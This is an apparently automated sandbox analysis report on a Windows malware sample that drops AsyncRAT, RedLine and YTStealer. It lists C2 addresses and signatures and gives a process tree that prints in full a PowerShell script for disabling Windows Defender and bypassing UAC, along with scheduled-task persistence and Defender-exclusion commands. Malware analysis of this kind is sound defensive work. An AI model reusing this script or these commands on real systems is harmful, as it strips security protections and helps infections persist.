Analysis

  • max time kernel
    118s
  • max time network
    150s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20220721-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20220721-enlocale:en-usos:windows10-2004-x64system
  • submitted
    30/07/2022, 13:01

General

  • Target

    48084-116-0x0000000000ED0000-0x00000000013FA000-memory.exe

  • Size

    5.2MB

  • MD5

    9170ac4e0a5177f903c178360de91dfb

  • SHA1

    f4ca61c687fea0482a2b331b98f218b4f92d9041

  • SHA256

    f2ff7231a4988f1810539eef98fe32d896b67c3ed1b38c89149696a10c79e205

  • SHA512

    6bfcf506f1b2ebe8612c1638284e7ec60ad48f5a72cc9c225b0e7b52aff23d3bd3207bc65b0161f94680ce55e58047311245065ebc83af14c336151bca0cbafd

Malware Config

Extracted

Family

asyncrat

Version

1.0.7

Botnet

glhff

C2

179.43.162.20:1337

Mutex

vasdvasavavaba

Attributes
  • delay

    1

  • install

    true

  • install_file

    winlogonl.exe

  • install_folder

    %Temp%

aes.plain

Extracted

Family

redline

C2

193.106.191.160:8673

Attributes
  • auth_value

    7824e9f60118486d456c723edbe36fe1

Signatures

  • AsyncRat

    AsyncRAT is designed to remotely monitor and control other computers.

  • Modifies Windows Defender Real-time Protection settings 3 TTPs 7 IoCs
  • RedLine

    RedLine Stealer is a malware family written in C#, first appearing in early 2020.

  • RedLine payload 1 IoCs
  • Suspicious use of NtCreateUserProcessOtherParentProcess 1 IoCs
  • YTStealer

    YTStealer is a malware designed to steal YouTube authentication cookies.

  • YTStealer payload 2 IoCs
  • Async RAT payload 5 IoCs
  • Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs 1 IoCs
  • Downloads MZ/PE file
  • Executes dropped EXE 18 IoCs
  • UPX packed file 5 IoCs

    Detects executables packed with UPX/modified UPX open source packer.

  • Checks BIOS information in registry 2 TTPs 2 IoCs

    BIOS information is often read in order to detect sandboxing environments.

  • Checks computer location settings 2 TTPs 7 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Loads dropped DLL 7 IoCs
  • Reads user/profile data of web browsers 2 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

  • Windows security modification 2 TTPs 2 IoCs
  • Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
  • Checks whether UAC is enabled 1 TTPs 1 IoCs
  • Suspicious use of SetThreadContext 3 IoCs
  • Launches sc.exe 3 IoCs

    Sc.exe is a Windows utlilty to control services on the system.

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • Program crash 1 IoCs
  • Creates scheduled task(s) 1 TTPs 3 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

  • Delays execution with timeout.exe 3 IoCs
  • Modifies data under HKEY_USERS 46 IoCs
  • Runs net.exe
  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs
  • Views/modifies file attributes 1 TTPs 1 IoCs

Processes

  • C:\Windows\system32\lsass.exe
    C:\Windows\system32\lsass.exe
    1⤵
      PID:660
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        powershell -nop -win 1 -c & {rp hkcu:\environment windir -ea 0;$AveYo=' (\ /) ( * . * ) A limited account protects you from UAC exploits ``` ';$env:1=6;iex((gp Registry::HKEY_Users\S-1-5-21*\Volatile* ToggleDefender -ea 0)[0].ToggleDefender)}
        2⤵
        • Modifies Windows Defender Real-time Protection settings
        • Modifies data under HKEY_USERS
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        • Suspicious use of WriteProcessMemory
        PID:5036
        • C:\Windows\system32\sc.exe
          "C:\Windows\system32\sc.exe" qc windefend
          3⤵
          • Launches sc.exe
          PID:3804
        • C:\Windows\system32\cmd.exe
          "C:\Windows\system32\cmd.exe" /d/r SecurityHealthSystray & "%ProgramFiles%\Windows Defender\MSASCuiL.exe"
          3⤵
            PID:4616
          • C:\Windows\system32\whoami.exe
            "C:\Windows\system32\whoami.exe" /groups
            3⤵
            • Suspicious use of AdjustPrivilegeToken
            PID:3880
          • C:\Windows\system32\net1.exe
            "C:\Windows\system32\net1.exe" stop windefend
            3⤵
              PID:4276
            • C:\Windows\system32\sc.exe
              "C:\Windows\system32\sc.exe" config windefend depend= RpcSs-TOGGLE
              3⤵
              • Launches sc.exe
              PID:1352
        • C:\Users\Admin\AppData\Local\Temp\48084-116-0x0000000000ED0000-0x00000000013FA000-memory.exe
          "C:\Users\Admin\AppData\Local\Temp\48084-116-0x0000000000ED0000-0x00000000013FA000-memory.exe"
          1⤵
          • Checks computer location settings
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          • Suspicious use of WriteProcessMemory
          PID:4440
          • C:\Windows\System32\cmd.exe
            "C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "winlogonl" /tr '"C:\Users\Admin\AppData\Local\Temp\winlogonl.exe"' & exit
            2⤵
            • Suspicious use of WriteProcessMemory
            PID:3076
            • C:\Windows\system32\schtasks.exe
              schtasks /create /f /sc onlogon /rl highest /tn "winlogonl" /tr '"C:\Users\Admin\AppData\Local\Temp\winlogonl.exe"'
              3⤵
              • Creates scheduled task(s)
              PID:4612
          • C:\Windows\system32\cmd.exe
            C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\tmp7BBC.tmp.bat""
            2⤵
            • Suspicious use of WriteProcessMemory
            PID:2196
            • C:\Windows\system32\timeout.exe
              timeout 3
              3⤵
              • Delays execution with timeout.exe
              PID:4596
            • C:\Users\Admin\AppData\Local\Temp\winlogonl.exe
              "C:\Users\Admin\AppData\Local\Temp\winlogonl.exe"
              3⤵
              • Executes dropped EXE
              • Checks computer location settings
              • Suspicious behavior: EnumeratesProcesses
              • Suspicious use of AdjustPrivilegeToken
              • Suspicious use of WriteProcessMemory
              PID:4560
              • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -enc @ ( e c h o   o f f % ) [ 1 ]  
 s p   ' H K C U : \ V o l a t i l e   E n v i r o n m e n t '   ' T o g g l e D e f e n d e r '   @ '  
 i f   ( $ ( s c . e x e   q c   w i n d e f e n d )   - l i k e   ' * T O G G L E * ' )   { $ T O G G L E = 7 ; $ K E E P = 6 ; $ A = ' E n a b l e ' ; $ S = ' O F F ' } e l s e { $ T O G G L E = 6 ; $ K E E P = 7 ; $ A = ' D i s a b l e ' ; $ S = ' O N ' }  
  
 i f   ( $ e n v : 1   - n e   6   - a n d   $ e n v : 1   - n e   7 )   {   $ e n v : 1 = $ T O G G L E   }  
  
 s t a r t   c m d   - a r g s   ' / d / r   S e c u r i t y H e a l t h S y s t r a y   &   " % P r o g r a m F i l e s % \ W i n d o w s   D e f e n d e r \ M S A S C u i L . e x e " '   - w i n   1  
  
 $ n o t i f = ' H K C U : \ S O F T W A R E \ M i c r o s o f t \ W i n d o w s \ C u r r e n t V e r s i o n \ N o t i f i c a t i o n s \ S e t t i n g s \ W i n d o w s . S y s t e m T o a s t . S e c u r i t y A n d M a i n t e n a n c e '  
 n i   $ n o t i f   - e a   0 | o u t - n u l l ;   r i   $ n o t i f . r e p l a c e ( ' S e t t i n g s ' , ' C u r r e n t ' )   - R e c u r s e   - F o r c e   - e a   0  
 s p   $ n o t i f   E n a b l e d   0   - T y p e   D w o r d   - F o r c e   - e a   0 ;   i f   ( $ T O G G L E   - e q   7 )   { r p   $ n o t i f   E n a b l e d   - F o r c e   - e a   0 }  
  
 $ t s = N e w - O b j e c t   - C o m O b j e c t   ' S c h e d u l e . S e r v i c e ' ;   $ t s . C o n n e c t ( ) ;   $ b a f f l i n g = $ t s . G e t F o l d e r ( ' \ M i c r o s o f t \ W i n d o w s \ D i s k C l e a n u p ' )  
 $ b p a s s = $ b a f f l i n g . G e t T a s k ( ' S i l e n t C l e a n u p ' ) ;   $ f l a w = $ b p a s s . D e f i n i t i o n  
  
 $ u = 0 ; $ w = w h o a m i   / g r o u p s ; i f ( $ w - l i k e ' * 1 - 5 - 3 2 - 5 4 4 * ' ) { $ u = 1 } ; i f ( $ w - l i k e ' * 1 - 1 6 - 1 2 2 8 8 * ' ) { $ u = 2 } ; i f ( $ w - l i k e ' * 1 - 1 6 - 1 6 3 8 4 * ' ) { $ u = 3 }  
  
 $ r = [ c h a r ] 1 3 ;   $ n f o = [ c h a r ] 3 9 + $ r + '   ( \       / ) ' + $ r + ' (   *   .   *   )     A   l i m i t e d   a c c o u n t   p r o t e c t s   y o u   f r o m   U A C   e x p l o i t s ' + $ r + '         ` ` ` ' + $ r + [ c h a r ] 3 9  
 $ s c r i p t = ' - n o p   - w i n   1   - c   &   { r p   h k c u : \ e n v i r o n m e n t   w i n d i r   - e a   0 ; $ A v e Y o = ' + $ n f o + ' ; $ e n v : 1 = ' + $ e n v : 1 ;   $ e n v : _ _ C O M P A T _ L A Y E R = ' I n s t a l l e r '  
 $ s c r i p t + = ' ; i e x ( ( g p   R e g i s t r y : : H K E Y _ U s e r s \ S - 1 - 5 - 2 1 * \ V o l a t i l e *   T o g g l e D e f e n d e r   - e a   0 ) [ 0 ] . T o g g l e D e f e n d e r ) } ' ;   $ c m d = ' p o w e r s h e l l   ' + $ s c r i p t  
  
 i f   ( $ u   - e q   0 )   {  
     s t a r t   p o w e r s h e l l   - a r g s   $ s c r i p t   - v e r b   r u n a s   - w i n   1 ;   b r e a k  
 }  
 i f   ( $ u   - e q   1 )   {  
     i f   ( $ f l a w . A c t i o n s . I t e m ( 1 ) . P a t h   - i n o t l i k e   ' * w i n d i r * ' ) { s t a r t   p o w e r s h e l l   - a r g s   $ s c r i p t   - v e r b   r u n a s   - w i n   1 ;   b r e a k }  
     s p   h k c u : \ e n v i r o n m e n t   w i n d i r   $ ( ' p o w e r s h e l l   ' + $ s c r i p t + '   # ' )  
     $ z = $ b p a s s . R u n E x ( $ n u l l , 2 , 0 , $ n u l l ) ;   $ w a i t = 0 ;   w h i l e ( $ b p a s s . S t a t e   - g t   3   - a n d   $ w a i t   - l t   1 7 ) { s l e e p   - m   1 0 0 ;   $ w a i t + = 0 . 1 }  
     i f ( g p   h k c u : \ e n v i r o n m e n t   w i n d i r   - e a   0 ) { r p   h k c u : \ e n v i r o n m e n t   w i n d i r   - e a   0 ; s t a r t   p o w e r s h e l l   - a r g s   $ s c r i p t   - v e r b   r u n a s   - w i n   1 } ; b r e a k  
 }  
 i f   ( $ u   - e q   2 )   {  
     $ A = [ A p p D o m a i n ] : : C u r r e n t D o m a i n . " D e f ` i n e D y n a m i c A s s e m b l y " ( 1 , 1 ) . " D e f ` i n e D y n a m i c M o d u l e " ( 1 ) ; $ D = @ ( ) ; 0 . . 5 | % { $ D + = $ A . " D e f ` i n e T y p e " ( ' A ' + $ _ ,  
     1 1 7 9 9 1 3 , [ V a l u e T y p e ] ) }   ; 4 , 5 | % { $ D + = $ D [ $ _ ] . " M a k ` e B y R e f T y p e " ( ) }   ; $ I = [ I n t 3 2 ] ; $ J = " I n t ` P t r " ; $ P = $ I . m o d u l e . G e t T y p e ( " S y s t e m . $ J " ) ;   $ F = @ ( 0 )  
     $ F + = ( $ P , $ I , $ P ) , ( $ I , $ I , $ I , $ I , $ P , $ D [ 1 ] ) , ( $ I , $ P , $ P , $ P , $ I , $ I , $ I , $ I , $ I , $ I , $ I , $ I , [ I n t 1 6 ] , [ I n t 1 6 ] , $ P , $ P , $ P , $ P ) , ( $ D [ 3 ] , $ P ) , ( $ P , $ P , $ I , $ I )  
     $ S = [ S t r i n g ] ;   $ 9 = $ D [ 0 ] . " D e f ` i n e P I n v o k e M e t h o d " ( ' C r e a t e P r o c e s s ' , " k e r n e l ` 3 2 " , 8 2 1 4 , 1 , $ I , @ ( $ S , $ S , $ I , $ I , $ I , $ I , $ I , $ S , $ D [ 6 ] , $ D [ 7 ] ) , 1 , 4 )  
     1 . . 5 | % { $ k = $ _ ; $ n = 1 ; $ F [ $ _ ] | % { $ 9 = $ D [ $ k ] . " D e f ` i n e F i e l d " ( ' f ' + $ n + + , $ _ , 6 ) } } ; $ T = @ ( ) ; 0 . . 5 | % { $ T + = $ D [ $ _ ] . " C r ` e a t e T y p e " ( ) ; $ Z = [ u i n t p t r ] : : s i z e  
     n v   ( ' T ' + $ _ ) ( [ A c t i v a t o r ] : : C r e a t e I n s t a n c e ( $ T [ $ _ ] ) ) } ;   $ H = $ I . m o d u l e . G e t T y p e ( " S y s t e m . R u n t i m e . I n t e r o p ` S e r v i c e s . M a r ` s h a l " ) ;  
     $ W P = $ H . " G e t ` M e t h o d " ( " W r i t e $ J " , [ t y p e [ ] ] ( $ J , $ J ) ) ;   $ H G = $ H . " G e t ` M e t h o d " ( " A l l o c H ` G l o b a l " , [ t y p e [ ] ] ' i n t 3 2 ' ) ;   $ v = $ H G . i n v o k e ( $ n u l l , $ Z )  
     ' T r u s t e d I n s t a l l e r ' , ' l s a s s ' | % { i f ( ! $ p n ) { n e t 1   s t a r t   $ _   2 > & 1   > $ n u l l ; $ p n = [ D i a g n o s t i c s . P r o c e s s ] : : G e t P r o c e s s e s B y N a m e ( $ _ ) [ 0 ] ; } }  
     $ W P . i n v o k e ( $ n u l l , @ ( $ v , $ p n . H a n d l e ) ) ;   $ S Z = $ H . " G e t ` M e t h o d " ( " S i z e O f " , [ t y p e [ ] ] ' t y p e ' ) ;   $ T 1 . f 1 = 1 3 1 0 7 2 ;   $ T 1 . f 2 = $ Z ;   $ T 1 . f 3 = $ v ;   $ T 2 . f 1 = 1  
     $ T 2 . f 2 = 1 ; $ T 2 . f 3 = 1 ; $ T 2 . f 4 = 1 ; $ T 2 . f 6 = $ T 1 ; $ T 3 . f 1 = $ S Z . i n v o k e ( $ n u l l , $ T [ 4 ] ) ; $ T 4 . f 1 = $ T 3 ; $ T 4 . f 2 = $ H G . i n v o k e ( $ n u l l , $ S Z . i n v o k e ( $ n u l l , $ T [ 2 ] ) )  
     $ H . " G e t ` M e t h o d " ( " S t r u c t u r e T o ` P t r " , [ t y p e [ ] ] ( $ D [ 2 ] , $ J , ' b o o l e a n ' ) ) . i n v o k e ( $ n u l l , @ ( ( $ T 2 - a s   $ D [ 2 ] ) , $ T 4 . f 2 , $ f a l s e ) ) ; $ w i n d o w = 0 x 0 E 0 8 0 6 0 0  
     $ 9 = $ T [ 0 ] . " G e t ` M e t h o d " ( ' C r e a t e P r o c e s s ' ) . I n v o k e ( $ n u l l , @ ( $ n u l l , $ c m d , 0 , 0 , 0 , $ w i n d o w , 0 , $ n u l l , ( $ T 4 - a s   $ D [ 4 ] ) , ( $ T 5 - a s   $ D [ 5 ] ) ) ) ;   b r e a k  
 }  
  
 $ w d p = ' H K L M : \ S O F T W A R E \ P o l i c i e s \ M i c r o s o f t \ W i n d o w s   D e f e n d e r '  
 '   S e c u r i t y   C e n t e r \ N o t i f i c a t i o n s ' , ' \ U X   C o n f i g u r a t i o n ' , ' \ M p E n g i n e ' , ' \ S p y n e t ' , ' \ R e a l - T i m e   P r o t e c t i o n '   | %   { n i   ( $ w d p + $ _ ) - e a   0 | o u t - n u l l }  
  
 s p   ' H K L M : \ S O F T W A R E \ P o l i c i e s \ M i c r o s o f t \ W i n d o w s   D e f e n d e r   S e c u r i t y   C e n t e r \ N o t i f i c a t i o n s '   D i s a b l e N o t i f i c a t i o n s   1   - T y p e   D w o r d   - e a   0  
 s p   ' H K L M : \ S O F T W A R E \ P o l i c i e s \ M i c r o s o f t \ W i n d o w s   D e f e n d e r \ U X   C o n f i g u r a t i o n '   N o t i f i c a t i o n _ S u p p r e s s   1   - T y p e   D w o r d   - F o r c e   - e a   0  
 s p   ' H K L M : \ S O F T W A R E \ M i c r o s o f t \ W i n d o w s   D e f e n d e r   S e c u r i t y   C e n t e r \ N o t i f i c a t i o n s '   D i s a b l e N o t i f i c a t i o n s   1   - T y p e   D w o r d   - e a   0  
 s p   ' H K L M : \ S O F T W A R E \ M i c r o s o f t \ W i n d o w s   D e f e n d e r \ U X   C o n f i g u r a t i o n '   N o t i f i c a t i o n _ S u p p r e s s   1   - T y p e   D w o r d   - F o r c e   - e a   0  
 s p   ' H K L M : \ S O F T W A R E \ P o l i c i e s \ M i c r o s o f t \ W i n d o w s \ S y s t e m '   E n a b l e S m a r t S c r e e n   0   - T y p e   D w o r d   - F o r c e   - e a   0  
 s p   ' H K L M : \ S O F T W A R E \ P o l i c i e s \ M i c r o s o f t \ W i n d o w s   D e f e n d e r '   D i s a b l e A n t i S p y w a r e   1   - T y p e   D w o r d   - F o r c e   - e a   0  
 s p   ' H K L M : \ S O F T W A R E \ M i c r o s o f t \ W i n d o w s   D e f e n d e r '   D i s a b l e A n t i S p y w a r e   1   - T y p e   D w o r d   - F o r c e   - e a   0  
 n e t 1   s t o p   w i n d e f e n d  
 s c . e x e   c o n f i g   w i n d e f e n d   d e p e n d =   R p c S s - T O G G L E  
 k i l l   - N a m e   M p C m d R u n   - F o r c e   - e a   0  
 s t a r t   ( $ e n v : P r o g r a m F i l e s + ' \ W i n d o w s   D e f e n d e r \ M p C m d R u n . e x e ' )   - A r g   ' - D i s a b l e S e r v i c e '   - w i n   1  
 d e l   ( $ e n v : P r o g r a m D a t a + ' \ M i c r o s o f t \ W i n d o w s   D e f e n d e r \ S c a n s \ m p e n g i n e d b . d b ' )   - F o r c e   - e a   0                       # #   C o m m e n t e d   =   k e e p   s c a n   h i s t o r y  
 d e l   ( $ e n v : P r o g r a m D a t a + ' \ M i c r o s o f t \ W i n d o w s   D e f e n d e r \ S c a n s \ H i s t o r y \ S e r v i c e ' )   - R e c u r s e   - F o r c e   - e a   0  
 ' @   - F o r c e   - e a   0 ;   i e x ( ( g p   R e g i s t r y : : H K E Y _ U s e r s \ S - 1 - 5 - 2 1 * \ V o l a t i l e *   T o g g l e D e f e n d e r   - e a   0 ) [ 0 ] . T o g g l e D e f e n d e r )  
 # - _ - # 
                4⤵
                • Suspicious use of NtCreateUserProcessOtherParentProcess
                • Suspicious behavior: EnumeratesProcesses
                • Suspicious use of AdjustPrivilegeToken
                • Suspicious use of WriteProcessMemory
                PID:4964
                • C:\Windows\system32\sc.exe
                  "C:\Windows\system32\sc.exe" qc windefend
                  5⤵
                  • Launches sc.exe
                  PID:3188
                • C:\Windows\system32\cmd.exe
                  "C:\Windows\system32\cmd.exe" /d/r SecurityHealthSystray & "%ProgramFiles%\Windows Defender\MSASCuiL.exe"
                  5⤵
                    PID:2632
                  • C:\Windows\system32\whoami.exe
                    "C:\Windows\system32\whoami.exe" /groups
                    5⤵
                    • Suspicious use of AdjustPrivilegeToken
                    PID:212
                  • C:\Windows\system32\net1.exe
                    "C:\Windows\system32\net1.exe" start TrustedInstaller
                    5⤵
                      PID:2104
                    • C:\Windows\system32\net1.exe
                      "C:\Windows\system32\net1.exe" start lsass
                      5⤵
                        PID:2300
                    • C:\Windows\System32\cmd.exe
                      "C:\Windows\System32\cmd.exe" /c start /b powershell –ExecutionPolicy Bypass Start-Process -FilePath '"C:\Users\Admin\AppData\Local\Temp\gmx.exe"' & exit
                      4⤵
                      • Suspicious use of WriteProcessMemory
                      PID:440
                      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                        powershell –ExecutionPolicy Bypass Start-Process -FilePath '"C:\Users\Admin\AppData\Local\Temp\gmx.exe"'
                        5⤵
                        • Suspicious behavior: EnumeratesProcesses
                        • Suspicious use of AdjustPrivilegeToken
                        • Suspicious use of WriteProcessMemory
                        PID:4180
                        • C:\Users\Admin\AppData\Local\Temp\gmx.exe
                          "C:\Users\Admin\AppData\Local\Temp\gmx.exe"
                          6⤵
                          • Executes dropped EXE
                          • Suspicious use of SetThreadContext
                          • Suspicious use of WriteProcessMemory
                          PID:1776
                          • C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
                            "C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"
                            7⤵
                            • Suspicious behavior: EnumeratesProcesses
                            • Suspicious use of AdjustPrivilegeToken
                            PID:190772
                            • C:\Users\Admin\AppData\Roaming\yu.exe
                              "C:\Users\Admin\AppData\Roaming\yu.exe"
                              8⤵
                              • Executes dropped EXE
                              PID:60
                              • C:\Windows\system32\cmd.exe
                                C:\Windows\system32\cmd.exe /C choice /C Y /N /D Y /T 0 &Del C:\Users\Admin\AppData\Roaming\yu.exe
                                9⤵
                                  PID:158080
                                  • C:\Windows\system32\choice.exe
                                    choice /C Y /N /D Y /T 0
                                    10⤵
                                      PID:158136
                        • C:\Windows\System32\cmd.exe
                          "C:\Windows\System32\cmd.exe" /c start /b powershell –ExecutionPolicy Bypass Start-Process -FilePath '"C:\Users\Admin\AppData\Local\Temp\panel nac.exe"' & exit
                          4⤵
                          • Suspicious use of WriteProcessMemory
                          PID:191016
                          • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                            powershell –ExecutionPolicy Bypass Start-Process -FilePath '"C:\Users\Admin\AppData\Local\Temp\panel nac.exe"'
                            5⤵
                            • Suspicious behavior: EnumeratesProcesses
                            • Suspicious use of AdjustPrivilegeToken
                            • Suspicious use of WriteProcessMemory
                            PID:191072
                            • C:\Users\Admin\AppData\Local\Temp\panel nac.exe
                              "C:\Users\Admin\AppData\Local\Temp\panel nac.exe"
                              6⤵
                              • Executes dropped EXE
                              • Suspicious use of AdjustPrivilegeToken
                              • Suspicious use of WriteProcessMemory
                              PID:191180
                              • C:\Windows\system32\cmd.exe
                                C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\tmp201B.tmp.bat""
                                7⤵
                                • Suspicious use of WriteProcessMemory
                                PID:191288
                                • C:\Windows\system32\timeout.exe
                                  timeout 3
                                  8⤵
                                  • Delays execution with timeout.exe
                                  PID:191348
                                • C:\Users\Admin\AppData\Local\WindowsDriversEtc\dllhost.exe
                                  "C:\Users\Admin\AppData\Local\WindowsDriversEtc\dllhost.exe"
                                  8⤵
                                  • Executes dropped EXE
                                  • Checks computer location settings
                                  • Suspicious use of AdjustPrivilegeToken
                                  • Suspicious use of WriteProcessMemory
                                  PID:191424
                                  • C:\Windows\System32\cmd.exe
                                    "C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc MINUTE /mo 3 /rl highest /tn "MJOEOHFTTS" /tr '"C:\Users\Admin\AppData\Local\WindowsDriversEtc\dllhost.exe"' & exit
                                    9⤵
                                    • Suspicious use of WriteProcessMemory
                                    PID:190792
                                    • C:\Windows\system32\schtasks.exe
                                      schtasks /create /f /sc MINUTE /mo 3 /rl highest /tn "MJOEOHFTTS" /tr '"C:\Users\Admin\AppData\Local\WindowsDriversEtc\dllhost.exe"'
                                      10⤵
                                      • Creates scheduled task(s)
                                      PID:1120
                                  • C:\ProgramData\cc0mdfd2asm.exe
                                    "C:\ProgramData\cc0mdfd2asm.exe"
                                    9⤵
                                    • Executes dropped EXE
                                    • Suspicious use of SetThreadContext
                                    PID:3196
                                    • C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
                                      "C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"
                                      10⤵
                                      • Suspicious behavior: EnumeratesProcesses
                                      • Suspicious use of AdjustPrivilegeToken
                                      PID:157364
                                      • C:\Windows\SysWOW64\rundll32.exe
                                        C:\Windows\System32\rundll32.exe url.dll,FileProtocolHandler C:\Users\Admin\AppData\Local\Temp\1.exe
                                        11⤵
                                        • Checks computer location settings
                                        PID:158176
                                        • C:\Users\Admin\AppData\Local\Temp\1.exe
                                          "C:\Users\Admin\AppData\Local\Temp\1.exe"
                                          12⤵
                                          • Executes dropped EXE
                                          • Checks computer location settings
                                          PID:158248
                                          • C:\Windows\system32\cmd.exe
                                            C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\main\main.bat" /S"
                                            13⤵
                                              PID:158316
                                              • C:\Windows\system32\mode.com
                                                mode 65,10
                                                14⤵
                                                  PID:158388
                                                • C:\Users\Admin\AppData\Local\Temp\main\7z.exe
                                                  7z.exe e file.zip -p225921790621787146061903719116 -oextracted
                                                  14⤵
                                                  • Executes dropped EXE
                                                  • Loads dropped DLL
                                                  • Suspicious use of AdjustPrivilegeToken
                                                  PID:158424
                                                • C:\Users\Admin\AppData\Local\Temp\main\7z.exe
                                                  7z.exe e extracted/file_6.zip -oextracted
                                                  14⤵
                                                  • Executes dropped EXE
                                                  • Loads dropped DLL
                                                  • Suspicious use of AdjustPrivilegeToken
                                                  PID:158460
                                                • C:\Users\Admin\AppData\Local\Temp\main\7z.exe
                                                  7z.exe e extracted/file_5.zip -oextracted
                                                  14⤵
                                                  • Executes dropped EXE
                                                  • Loads dropped DLL
                                                  • Suspicious use of AdjustPrivilegeToken
                                                  PID:158508
                                                • C:\Users\Admin\AppData\Local\Temp\main\7z.exe
                                                  7z.exe e extracted/file_4.zip -oextracted
                                                  14⤵
                                                  • Executes dropped EXE
                                                  • Loads dropped DLL
                                                  • Suspicious use of AdjustPrivilegeToken
                                                  PID:158580
                                                • C:\Users\Admin\AppData\Local\Temp\main\7z.exe
                                                  7z.exe e extracted/file_2.zip -oextracted
                                                  14⤵
                                                  • Executes dropped EXE
                                                  • Loads dropped DLL
                                                  PID:158668
                                                • C:\Users\Admin\AppData\Local\Temp\main\5us64diotf.exe
                                                  "5us64diotf.exe"
                                                  14⤵
                                                  • Identifies VirtualBox via ACPI registry values (likely anti-VM)
                                                  • Executes dropped EXE
                                                  • Checks BIOS information in registry
                                                  • Checks whether UAC is enabled
                                                  PID:158780
                                                • C:\Windows\system32\attrib.exe
                                                  attrib +H "5us64diotf.exe"
                                                  14⤵
                                                  • Views/modifies file attributes
                                                  PID:158760
                                                • C:\Users\Admin\AppData\Local\Temp\main\7z.exe
                                                  7z.exe e extracted/file_1.zip -oextracted
                                                  14⤵
                                                  • Executes dropped EXE
                                                  • Loads dropped DLL
                                                  PID:158704
                                                • C:\Users\Admin\AppData\Local\Temp\main\7z.exe
                                                  7z.exe e extracted/file_3.zip -oextracted
                                                  14⤵
                                                  • Executes dropped EXE
                                                  • Loads dropped DLL
                                                  PID:158616
                                          • C:\Windows\SysWOW64\rundll32.exe
                                            C:\Windows\System32\rundll32.exe url.dll,FileProtocolHandler C:\Users\Admin\AppData\Local\Temp\build.exe
                                            11⤵
                                            • Checks computer location settings
                                            PID:158492
                                            • C:\Users\Admin\AppData\Local\Temp\build.exe
                                              "C:\Users\Admin\AppData\Local\Temp\build.exe"
                                              12⤵
                                              • Executes dropped EXE
                                              • Suspicious use of SetThreadContext
                                              PID:158832
                                              • C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
                                                "C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"
                                                13⤵
                                                  PID:23876
                                        • C:\Windows\system32\WerFault.exe
                                          C:\Windows\system32\WerFault.exe -u -p 191424 -s 1304
                                          9⤵
                                          • Program crash
                                          PID:24052
                              • C:\Windows\System32\cmd.exe
                                "C:\Windows\System32\cmd.exe" /c start /b powershell –ExecutionPolicy Bypass Start-Process -FilePath '"C:\Users\Admin\AppData\Local\Temp\pizda vam.exe"' & exit
                                4⤵
                                  PID:2100
                                  • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                    powershell –ExecutionPolicy Bypass Start-Process -FilePath '"C:\Users\Admin\AppData\Local\Temp\pizda vam.exe"'
                                    5⤵
                                    • Suspicious behavior: EnumeratesProcesses
                                    • Suspicious use of AdjustPrivilegeToken
                                    PID:4788
                                    • C:\Users\Admin\AppData\Local\Temp\pizda vam.exe
                                      "C:\Users\Admin\AppData\Local\Temp\pizda vam.exe"
                                      6⤵
                                      • Modifies Windows Defender Real-time Protection settings
                                      • Executes dropped EXE
                                      • Windows security modification
                                      • Suspicious use of AdjustPrivilegeToken
                                      PID:4056
                                      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                        "powershell" -Command Add-MpPreference -ExclusionPath 'C:\ProgramData'
                                        7⤵
                                        • Suspicious behavior: EnumeratesProcesses
                                        • Suspicious use of AdjustPrivilegeToken
                                        PID:788
                                      • C:\Windows\system32\cmd.exe
                                        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\tmp54C7.tmp.bat""
                                        7⤵
                                          PID:2448
                                          • C:\Windows\system32\timeout.exe
                                            timeout 3
                                            8⤵
                                            • Delays execution with timeout.exe
                                            PID:3248
                                          • C:\ProgramData\AstarotSoftware\ULKPF.exe
                                            "C:\ProgramData\AstarotSoftware\ULKPF.exe"
                                            8⤵
                                            • Modifies Windows Defender Real-time Protection settings
                                            • Executes dropped EXE
                                            • Checks computer location settings
                                            • Windows security modification
                                            • Suspicious behavior: EnumeratesProcesses
                                            • Suspicious use of AdjustPrivilegeToken
                                            PID:516
                                            • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                              "powershell" -Command Add-MpPreference -ExclusionPath 'C:\ProgramData'
                                              9⤵
                                              • Suspicious behavior: EnumeratesProcesses
                                              • Suspicious use of AdjustPrivilegeToken
                                              PID:1216
                                            • C:\Windows\System32\cmd.exe
                                              "C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc MINUTE /mo 5 /RL HIGHEST /tn "ULKPF" /tr "C:\ProgramData\AstarotSoftware\ULKPF.exe"
                                              9⤵
                                                PID:316
                                                • C:\Windows\system32\schtasks.exe
                                                  schtasks /create /f /sc MINUTE /mo 5 /RL HIGHEST /tn "ULKPF" /tr "C:\ProgramData\AstarotSoftware\ULKPF.exe"
                                                  10⤵
                                                  • Creates scheduled task(s)
                                                  PID:3052
